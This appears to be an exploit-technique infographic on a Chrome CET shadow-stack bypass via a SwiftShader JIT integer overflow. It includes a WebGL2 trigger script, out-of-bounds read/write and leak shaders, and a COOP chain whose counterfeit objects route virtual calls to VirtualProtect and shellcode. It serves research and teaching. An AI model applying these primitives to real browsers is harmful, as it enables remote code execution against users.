Bypassing Intel CET Shadow Stack

An infographic detailing the CVE-2023-3598 "SwiftZero" Chrome sandbox escape which bypasses Intel CET Shadow Stack on Windows x64.

Intel CET Shadow Stack

A Hardware Defense

Intel's Control-flow Enforcement Technology (CET) is a hardware-level defense. Its key feature for this talk is the Shadow Stack, a CPU-protected stack that creates a secure record of return addresses to prevent backward-edge control flow attacks.

The Audit

On every function return, the CPU compares the return address on the normal stack with the one on the Shadow Stack. If they differ, it raises a control-protection (#CP) fault, which normally terminates the process. This is designed to stop return-oriented programming (ROP) attacks, which depend on overwriting return addresses.

Normal Function Call with CET

1. Example Code


void foo() { ... }

int main() {
  foo(); // <-- CALL
  // <-- return addr is here
}

2. Resulting Stacks

Call Stack

...

return addr

foo() stack frame

Shadow Stack

...

return addr

The call instruction pushes the return address to both stacks simultaneously.

3. When Return Addresses Mismatch

Call Stack

...

corrupted addr

foo() stack frame

Shadow Stack

...

real return addr

#CP Fault: Process Terminated

CPU detects mismatch during RET instruction and triggers a hardware fault.
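The call and return behaviour described above can be modelled in a few lines of software. This is only a toy sketch: real CET performs the check in hardware, and the class and method names below are hypothetical, not part of any Intel or Windows API.

```cpp
#include <cstdint>
#include <vector>

// Toy software model of the shadow-stack check. All names are hypothetical.
class ShadowStackModel {
public:
    // CALL: the return address is pushed to both stacks.
    void call(std::uint64_t returnAddr) {
        callStack_.push_back(returnAddr);
        shadowStack_.push_back(returnAddr);
    }

    // Models memory corruption: only the normal call stack is writable.
    void corruptTopReturnAddress(std::uint64_t value) {
        if (!callStack_.empty()) callStack_.back() = value;
    }

    // RET: pop both copies and compare them. Returns true when the return
    // would proceed, false where the CPU would raise a #CP fault.
    bool ret() {
        if (callStack_.empty() || shadowStack_.empty()) return false;
        const std::uint64_t fromCallStack = callStack_.back();
        const std::uint64_t fromShadowStack = shadowStack_.back();
        callStack_.pop_back();
        shadowStack_.pop_back();
        return fromCallStack == fromShadowStack;
    }

private:
    std::vector<std::uint64_t> callStack_;
    std::vector<std::uint64_t> shadowStack_;
};
```

In this model an untouched call/return pair succeeds, while overwriting the top of the normal stack before `ret()` makes it return false, which corresponds to the #CP fault in the diagram.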

How CET Defeats ROP

1. ROP Gadget

pop rcx
ret

A typical gadget found in legitimate code.

2. How ROP Fails

Call Stack

ROP gadget addr

value for RCX

Shadow Stack

...

legitimate addr

MISMATCH: #CP Fault on ret

How CET Hinders JOP

1. JOP Gadget

mov rcx, [rbx]
jmp rcx ; <-- VirtualProtect

A gadget to perform an action and jump.

2. How JOP Can Fail

Hijacks control to a JOP gadget

↓

JOP gadget jumps to VirtualProtect

↓

VirtualProtect finishes and executes ret

Shadow Stack still expects the original return address.

↓

MISMATCH: #CP Fault on ret

How CET Hinders COP

1. COP Gadget

; COP gadget found in real code
mov rdx, [rax+0x20]    ; Load VirtualProtect addr
call rdx               ; Call VirtualProtect - SUCCESS!
mov rbx, [rax+0x30]    ; ← VirtualProtect returns HERE
add rsp, 0x28          ; Unwanted stack manipulation
pop r14                ; Destroys register state

Real gadgets have problematic instructions that destroy control flow.

2. How COP Can Fail

Attacker controls [rax+0x20] = &VirtualProtect

↓

call rdx → VirtualProtect()

Shadow Stack: must return to line 4

↓

VirtualProtect() executes & returns

↓

Returns to line 4 (unwanted!)

Stack manipulation destroys control

↓

add rsp, 0x28; pop r14

↓

Control flow completely lost

COP can call one function, but can't skip the destructive instructions that follow.

The Road to CET

2016

Intel Publishes CET Specs

The initial specification is released to give the software ecosystem time to prepare.

2020

Hardware & OS Support Arrives

Intel releases 11th Gen "Tiger Lake" CPUs with CET. Microsoft enables "Hardware-enforced Stack Protection" in Windows 10 (20H1).

2021

Browser Adoption Begins

Google starts enabling CET support in Chrome 90.

2022

Protection Extends to the Core

Microsoft introduces Kernel-mode Hardware-enforced Stack Protection in Windows 11 (22H2).

CET's deployment was a multi-year collaboration between hardware, OS, and application vendors.

Windows' Compatibility Mode

Windows doesn't just turn CET on. It uses a flexible system called "Hardware-enforced Stack Protection" (HSP). This compatibility mode introduces specific rules that an attacker can potentially exploit.

Kernel Fault Investigation Logic

#CP Fault Triggered

CPU detects mismatch

↓

Kernel Investigates

KiControlProtectionFault

ALLOW Cases

Return address found anywhere on the Shadow Stack?

ALLOW

Legitimate return

Return from non-CETCOMPAT dynamic code?

ALLOW

JIT/interpreted code exemption

Return from non-CETCOMPAT module?

ALLOW

Legacy compatibility

TERMINATE Cases

Return from CETCOMPAT code without valid Shadow Stack entry?

TERMINATE

CET violation detected

Return from CETCOMPAT module with mismatch?

TERMINATE

CET violation detected
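The ALLOW and TERMINATE cases above amount to a small decision function. The sketch below encodes only the rules as listed in this infographic; the types and the function name are hypothetical and do not reflect the actual structure of KiControlProtectionFault.

```cpp
// Hypothetical model of the decision rules listed above.
enum class CodeOrigin {
    CetCompatModule,          // module linked as CETCOMPAT
    NonCetCompatModule,       // legacy module without the CETCOMPAT marking
    NonCetCompatDynamicCode   // JIT-compiled or otherwise dynamic code
};

enum class Verdict { Allow, Terminate };

struct FaultContext {
    bool returnAddressOnShadowStack;  // target found anywhere on the shadow stack
    CodeOrigin origin;                // where the faulting RET executed
};

Verdict investigate(const FaultContext& ctx) {
    // A return address that appears on the shadow stack is treated as legitimate.
    if (ctx.returnAddressOnShadowStack) return Verdict::Allow;

    switch (ctx.origin) {
        case CodeOrigin::NonCetCompatDynamicCode:
            return Verdict::Allow;      // JIT/interpreted code exemption
        case CodeOrigin::NonCetCompatModule:
            return Verdict::Allow;      // legacy compatibility
        case CodeOrigin::CetCompatModule:
            return Verdict::Terminate;  // CET violation
    }
    return Verdict::Terminate;
}
```

Written this way, the second and third branches make the compatibility gap visible: a mismatched return is only fatal when it originates in CETCOMPAT code.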

Key Insight

The kernel's compatibility exemptions for non-CETCOMPAT dynamic code (like JIT-compiled shaders) create a bypass opportunity. SwiftShader's JIT code is exempt from CET enforcement, allowing our exploit to work.

The SwiftZero Bug (CVE-2023-3598)

The vulnerability (CVE-2023-3598) lies within SwiftShader's JIT compiler. A 32-bit integer overflow when calculating stack space for large shader variables leads to a classic stack-based buffer overflow.

The Vulnerable Code: Cfg::sortAndCombineAllocas

void Cfg::sortAndCombineAllocas(CfgVector<InstAlloca *> &Allocas,
                                uint32_t CombinedAlignment, InstList &Insts,
                                AllocaBaseVariableType BaseVariableType) {
  if (Allocas.empty())
    return;
    ...
  uint32_t CurrentOffset = 0;  // 32-bit integer can overflow!
  CfgVector<int32_t> Offsets;
  
  // The vulnerable loop:
  for (Inst *Instr : Allocas) {
    auto *Alloca = llvm::cast<InstAlloca>(Instr);
    uint32_t Alignment = std::max(Alloca->getAlignInBytes(), 1u);
    auto *ConstSize = 
        llvm::dyn_cast<ConstantInteger32>(Alloca->getSizeInBytes());
    // Size can be controlled by attacker via shader code
    uint32_t Size = Utils::applyAlignment(ConstSize->getValue(), Alignment);
    
    ...
    Offsets.push_back(...);
    CurrentOffset += Size;  // INTEGER OVERFLOW HERE!
  }
  
  // Round the offset up to the alignment to determine the final allocation size
  uint32_t TotalSize = Utils::applyAlignment(CurrentOffset, CombinedAlignment);
  ...
}

Line 7: CurrentOffset is a 32-bit unsigned integer that can overflow

Line 17: Size can be controlled by attacker via shader code

Line 21: Integer overflow occurs here when CurrentOffset wraps around

Line 25: The overflowed value leads to an undersized allocation

You can craft shader variables large enough to cause CurrentOffset to wrap around, resulting in an undersized stack frame allocation.
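The wrap-around itself is plain modular arithmetic. The sketch below reproduces the shape of the vulnerable accumulation with made-up sizes (they are not the real alloca sizes SwiftShader computes) and contrasts it with a checked sum. The checked variant is one possible hardening shown for illustration, not necessarily the upstream fix, and both function names are hypothetical.

```cpp
#include <cstdint>
#include <limits>
#include <optional>
#include <vector>

// Same shape as the vulnerable loop: sizes are accumulated in 32 bits,
// so the running total silently wraps modulo 2^32.
std::uint32_t sumWrapping(const std::vector<std::uint32_t>& sizes) {
    std::uint32_t offset = 0;
    for (std::uint32_t size : sizes) {
        offset += size;  // unsigned overflow is well defined: it wraps
    }
    return offset;
}

// Illustrative hardening: reject any total that does not fit in 32 bits.
std::optional<std::uint32_t> sumChecked(const std::vector<std::uint32_t>& sizes) {
    std::uint32_t offset = 0;
    for (std::uint32_t size : sizes) {
        if (size > std::numeric_limits<std::uint32_t>::max() - offset) {
            return std::nullopt;  // the addition would overflow
        }
        offset += size;
    }
    return offset;
}
```

With the hypothetical sizes 0xFFFFFF00 and 0x200, the true total is 0x100000100, but `sumWrapping` returns 0x100, so a frame of only 256 bytes would be reserved for roughly 4 GiB of variables. `sumChecked` returns an empty optional for the same input.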

Compiling a Shader

(() => {
    // Create a temporary canvas to get a WebGL2 context
    const canvas = document.createElement('canvas');
    const gl = canvas.getContext('webgl2');

    if (!gl) {
        console.error("WebGL 2 is not available on your browser.");
        return;
    }

    // Vertex shader whose oversized array triggers the overflow
    const vsSource = `
        #version 300 es
        mat4 buf[0xffffff]; // Trigger the overflow in sortAndCombineAllocas
        void main() {
            buf[1][2][3]=uintBitsToFloat(0x41414141);
    }`;

    // --- The Compilation Process ---
    const shader = gl.createShader(gl.VERTEX_SHADER);
    gl.shaderSource(shader, vsSource);
    gl.compileShader(shader);

    // --- Check the Result ---
    if (gl.getShaderParameter(shader, gl.COMPILE_STATUS)) {
        console.log("Shader compiled successfully!");
    } else {
        console.error("Shader compilation failed:");
        console.error(gl.getShaderInfoLog(shader));
    }
})();

Client-Side Shader Compilation via WebGL2 using JavaScript

Line 14: Large array triggers integer overflow

Memory Corruption: Out-of-Bounds Write

1. Shader Code


#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xffffff];
void main() {
  // These writes go out of bounds
  buf[1][2][3]=uintBitsToFloat(0x41414141);
}

Line 4: Large array triggers integer overflow

Line 7: Out-of-bounds write overwrites return address

2. Result: Memory Corruption

Memory Layout

Target: 0x4141414141414141 (return addr)

...writable memory in between...

Array bounds end here

buf[0xffffff]

Writing past the array bounds overwrites sensitive stack data such as the return address.

Information Disclosure: Out-of-Bounds Read

1. Shader Code


#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xffffff];
flat out uint returnAddr;
void main() {
    // These reads go out of bounds
    returnAddr = floatBitsToUint(buf[1][2][3]);
}

Line 4: Large array triggers integer overflow

Line 8: Out-of-bounds read leaks return address

2. Result: Memory Disclosure

Memory Layout

Target: 0x7fff12345678 (return addr)

...readable memory in between...

Array bounds end here

buf[0xffffff]

Reading past array bounds exposes sensitive stack data like the return addresses.
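The shaders above move raw 32-bit patterns in and out of float variables with the GLSL built-ins uintBitsToFloat and floatBitsToUint. For readers more familiar with C++, the following sketch shows the equivalent bit reinterpretation. The helpers reuse the GLSL names for clarity, but they are ordinary C++ functions written for this illustration.

```cpp
#include <cstdint>
#include <cstring>

static_assert(sizeof(float) == sizeof(std::uint32_t),
              "this sketch assumes a 32-bit float");

// Reinterpret the bits of a float as an unsigned integer (no numeric conversion).
std::uint32_t floatBitsToUint(float f) {
    std::uint32_t u;
    std::memcpy(&u, &f, sizeof u);
    return u;
}

// Reinterpret the bits of an unsigned integer as a float (no numeric conversion).
float uintBitsToFloat(std::uint32_t u) {
    float f;
    std::memcpy(&f, &u, sizeof f);
    return f;
}
```

Because each value is only 32 bits wide, a single read or write covers half of a 64-bit address; handling a full pointer would take two adjacent elements.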

Allocation and Leak Primitive

1. Shader Code


#version 300 es
mat4 buf[0xffffff];
flat out uint value;
layout(std140) uniform Buffer {
    uint value[0x100];
} buffer;
uint extra[0x10];

void main() {
    // Read and write operations to
    // avoid compiler optimizations
    buf[0][0][0] = uintBitsToFloat(buffer.value[0x1]);
    extra[0] = floatBitsToUint(buf[0][0][0]);
    buf[0][0][1] = uintBitsToFloat(extra[0]);
    // Leak the address of the Uniform Buffer Object
    value = floatBitsToUint(buf[0][2][2]);
}

Line 3: Large array triggers integer overflow

Lines 13-15: Forces allocation of GlUniformBufferObject

Line 17: Leaks address of the Uniform Buffer Object

2. Result: Controlled Allocation

Memory Layout

Target: 0x23adfe0b100 (UBO addr)

...allocated memory in between...

Array bounds end here

buf[0xffffff]

The shader forces allocation of a GlUniformBufferObject and leaks its address for precise memory layout control.

The Exploitation Challenge

What We Have

• Read Primitive: Can leak stack addresses
• Write Primitive: Can write values to the stack
• Allocation Control: Can allocate data at known locations with controlled data
• IP Control: Can hijack the instruction pointer

What's Blocking Us

• CET defeats ROP: Shadow Stack validates returns
• CET hinders JOP: Jumping to code that still needs to return
• CET hinders COP: Difficult to maintain control of IP
• Need a new approach...

So what can we do?

We need a technique that:

1. Uses legitimate function calls
2. Leverages existing code
3. Works within CET's rules

Counterfeit Object-Oriented Programming

COOP: A code reuse attack targeting C++ applications, introduced by Felix Schuster et al. in 2015.

C++ Classes: With vs Without Virtual Functions

1. Regular Class (No Virtuals)

class SimpleTimer {
    uint64_t deadline;
    bool active;
public:
    void Stop() { active = false; }  // Direct call
    void Run() { /* execute */ }     // Direct call
};

SimpleTimer* timer = new SimpleTimer();
timer->Stop();  // Direct function call

Lines 5-6: Regular functions use direct calls

SimpleTimer Object

0x00:deadline

0x08:active

No vtable pointer - just data members

2. Class with Virtual Functions

class Timer {
    void* vtable_ptr;  // Hidden, compiler-added
    uint64_t deadline;
public:
    virtual void Stop() { ... }  // Indirect call
    virtual void Run() { ... }   // Indirect call
};

Timer* timer = new Timer();
timer->Run();  // Virtual call through vtable

Lines 5-6: Virtual functions require vtable lookup

Timer Object

0x00:vtable_ptr

0x08:deadline

→

VTable

0x00:&Stop

0x08:&Run

Hidden vtable pointer added as first member

Key Difference: Function Call Assembly

Regular Function Call

call SimpleTimer::Stop  ; Direct call to known address

Virtual Function Call

mov rax, [rcx]       ; Load vtable pointer
call [rax+0x8]      ; Indirect call through vtable

Virtual functions enable polymorphism but introduce indirection that COOP exploits
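A short compilable example makes the difference concrete. The class names below extend the infographic's illustration, and `LoggingTimer` is a hypothetical subclass added only to show dynamic dispatch.

```cpp
#include <string>

// No virtual functions: the call target is fixed at compile time.
struct SimpleTimer {
    std::string Stop() { return "SimpleTimer::Stop"; }
};

// Virtual functions: each object carries a hidden vtable pointer and
// the call target is looked up through it at run time.
struct Timer {
    virtual ~Timer() = default;
    virtual std::string Stop() { return "Timer::Stop"; }
    virtual std::string Run() { return "Timer::Run"; }
};

// Hypothetical subclass used to show that the same call site can reach
// different code depending on the object it is handed.
struct LoggingTimer : Timer {
    std::string Stop() override { return "LoggingTimer::Stop"; }
};

// One call site, compiled once. Which Stop() runs depends on the vtable
// pointer stored in the object passed in.
std::string stopThroughBase(Timer& timer) {
    return timer.Stop();
}
```

Passing a `Timer` yields "Timer::Stop", while passing a `LoggingTimer` to the very same function yields "LoggingTimer::Stop". The decision is made from data inside the object, which is the property COOP relies on.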

The COOP Attack Principle

Counterfeit Objects Replace Real Ones

1. Control Object Layout

Attacker creates fake objects with controlled vtable pointers

Fake Timer Object

0x00:&FakeTimerVtable

0x08:data...

↓

FakeTimerVtable

0x00:&VirtualProtect

0x08:&Shellcode

2. Hijack Virtual Calls

Virtual function calls become attacker-controlled indirect calls

; timer->Stop() becomes:
mov rax, [rcx]       ; Load fake vtable
call [rax+0x00]      ; Calls VirtualProtect!

; timer->Run() becomes:
call [rax+0x08]      ; Executes shellcode!

3. Chain Functions

Chain existing functions together to achieve arbitrary behavior

// Original code path:
timer->Stop();  // 1. VirtualProtect
timer->Run();   // 2. Shellcode

// Result: Memory made executable,
// then shellcode runs

COOP bypasses CFI by using legitimate virtual call sites with counterfeit objects. Every call is still matched by its own return, so the Shadow Stack sees no mismatch.
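The principle can be illustrated safely with an explicit function-pointer table standing in for the compiler-generated vtable. Everything in this sketch is hypothetical and harmless: the "redirected" functions only append to a log, and no real object is forged. It shows only that an unchanged call site follows whatever table the object points to.

```cpp
#include <string>
#include <vector>

struct TimerModel;
using Method = void (*)(TimerModel&);

// Stand-in for a vtable: one slot per "virtual" method.
struct MethodTable {
    Method stop;
    Method run;
};

struct TimerModel {
    const MethodTable* table;      // stands in for the hidden vtable pointer
    std::vector<std::string> log;  // records which functions actually ran
};

void realStop(TimerModel& t) { t.log.push_back("real Stop"); }
void realRun(TimerModel& t) { t.log.push_back("real Run"); }
void otherA(TimerModel& t) { t.log.push_back("unrelated function A"); }
void otherB(TimerModel& t) { t.log.push_back("unrelated function B"); }

const MethodTable kRealTable{realStop, realRun};
const MethodTable kCounterfeitTable{otherA, otherB};

// The call site is ordinary program code and never changes.
// It calls through slot 0, then slot 1, of whatever table it finds.
void onTaskInvoked(TimerModel& t) {
    t.table->stop(t);
    t.table->run(t);
}
```

Running `onTaskInvoked` on an object that points at `kRealTable` logs the real methods, while an object that points at `kCounterfeitTable` logs the two unrelated functions in order. Both runs use normal calls and normal returns throughout.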

Finding the Perfect COOP Gadget

Requirements for Our Virtual Call Site

1. Make Memory Executable (GlUniformBufferObject)

First virtual call must be redirectable to VirtualProtect

2. Execute Our Code

Second virtual call must call our shellcode

The Perfect Target: DeadlineTimer::OnScheduledTaskInvoked

void DeadlineTimer::OnScheduledTaskInvoked() {
  DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_);
  DCHECK(!delayed_task_handle_.IsValid());

  // Make a local copy of the task to run. The Stop method will reset the
  // |user_task_| member.
  OnceClosure task = std::move(user_task_);
  Stop();                  // Virtual call #1 - Perfect for VirtualProtect
  std::move(task).Run();   // Virtual call #2 - Perfect for shellcode execution
}

Line 8: First virtual call - we'll hijack this to call VirtualProtect

Line 9: Second virtual call - we'll hijack this to execute our shellcode

Two sequential virtual calls with controlled object = perfect COOP gadget

Disassembly Analysis: How The COOP Gadget Works

; DeadlineTimer::OnScheduledTaskInvoked()
; RCX = `this` pointer 
; (points to our FakeDeadlineTimer object)
push rsi
sub rsp, 0x20

; --- Part 1: Move the task object (std::move(user_task_)) ---
mov rax, [rcx]                       ; Load vtable pointer from our fake object
mov rsi, [rcx+0x48]                  ; Load 'user_task_' pointer (points to our payload)
mov [rcx+0x48], 0                    ; Zero out the pointer

; --- Part 2: Call Stop()            -> Hijacked to call VirtualProtect ---
mov rax, [rax+0x10]                  ; Load function pointer from fake vtable offset 0x10
                                     ; We placed &VirtualProtect here
call __guard_dispatch_icall_fptr
                                     ; CFG allows this - VirtualProtect is a valid target!
                                     ; Makes our shellcode executable

; --- Part 3: Call Run()             -> Hijacked to execute shellcode ---
mov rax, [rsi+8]                     ; Load &Payload from our counterfeit object

mov rcx, rsi                         ; Set 'this' pointer for the call
call __guard_dispatch_icall_fptr     ; Executes our shellcode

; --- Cleanup ---
test rsi, rsi
jne chrome.0x7~
add rsp, 0x20
pop rsi
ret

Line 8: Loads our controlled vtable pointer

Line 9: Loads user_task_ which points to our payload

Line 13: Loads VirtualProtect from our fake vtable

Line 15: Calls VirtualProtect

Line 20: Loads &Shellcode from the payload structure that user_task_ points to

Line 23: Second hijacked call - calls our shellcode

Why This COOP Gadget is Perfect

• Two virtual calls in sequence - exactly what we need
• No validation between calls - both execute unconditionally
• CFG allows VirtualProtect as a valid call target
• The payload pointer is held in RSI, a callee-saved register, so it survives the first call
• Common function in Chrome - likely to be present

Counterfeit Object Layout

FakeDeadlineTimer

0x00:&FakeVtable

0x08:padding

......

0x48:&FakeDeadlineTimer+0x50

0x50:0x0000000000000000

0x58:&Shellcode

0x60:Shellcode bytes...

Counterfeit object in GlUniformBuffer

→

FakeVtable

0x00:unused

0x08:unused

0x10:&VirtualProtect

0x18:unused

Stop() → VirtualProtect

Payload Structure

0x00:0x0000000000000000

0x08:&Shellcode

Run() → Shellcode

The object's user_task_ member (offset 0x48) points to offset 0x50, creating a self-referential structure that satisfies the COOP gadget's requirements.
